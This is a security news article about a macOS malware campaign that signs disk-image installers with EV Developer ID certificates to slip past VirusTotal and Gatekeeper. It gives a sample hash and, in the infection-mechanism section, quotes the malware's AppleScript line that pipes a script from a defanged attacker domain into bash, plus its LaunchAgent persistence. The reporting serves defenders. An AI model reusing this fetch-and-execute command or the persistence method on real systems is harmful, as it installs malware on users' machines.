In recent weeks, security analysts have observed a new wave of macOS attacks leveraging legitimately issued Extended Validation (EV) certificates to sign malicious disk images (DMGs).
This technique allows malware authors to evade detection by VirusTotal and built-in macOS security checks.
The campaign first surfaced when multiple samples appeared on threat intelligence feeds, each bearing a valid Developer ID Application signature.
Attackers are exploiting the high cost and stringent vetting of EV certificates to lend an air of legitimacy to otherwise malicious payloads.
Initial infections appear to be delivered via phishing lures, with compromised websites hosting the signed DMG installers masquerading as legitimate applications.
Who said what? (@g0njxa), a researcher noted that the abuse of EV certificates is not confined to Windows malware—it is increasingly present on macOS threats as well.
He identified a novel signed DMG, fully undetectable on VirusTotal, issued under the Developer ID “THOMAS BOULAY DUVAL (J97GLQ5KW9)”.
The sample (SHA256: a031ba8111ded0c11acfedea9ab83b4be8274584da71bcc88ff72e2d51957dd7) displays a bundle identifier mimicking the signer name (e.g., “thomas.parfums”), a poor attempt to camouflage within legitimate software distributions.
Once reported, these certificates are revoked, but not before they have enabled significant stealth in early campaign stages.
Despite the high financial and procedural barrier to obtaining Apple EV certificates, threat actors appear willing to invest in them, knowing that revocation may come too late to prevent initial compromise.
This underscores a growing trend: adversaries trading speed for legitimacy by leveraging established trust chains.
Infection Mechanism
The primary infection mechanism begins with a signed DMG that, when mounted, executes an embedded AppleScript launcher.
Examination of the Mach-O binary within the DMG reveals hardcoded references to a remote script host:-
#!/usr/bin/osascript
do shell script "curl -sL https://franceparfumes[.]org/parfume/install.sh | bash"Upon execution, the script downloads and executes an ARM64-compiled payload that establishes persistence by writing a LaunchAgent plist to ~/Library/LaunchAgents/com.thomas.parfums.agent.plist and relaunches itself at login.
This method bypasses Gatekeeper checks by relying on the valid EV signature and avoids triggering MRT scans, resulting in a fully undetectable installation flow.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
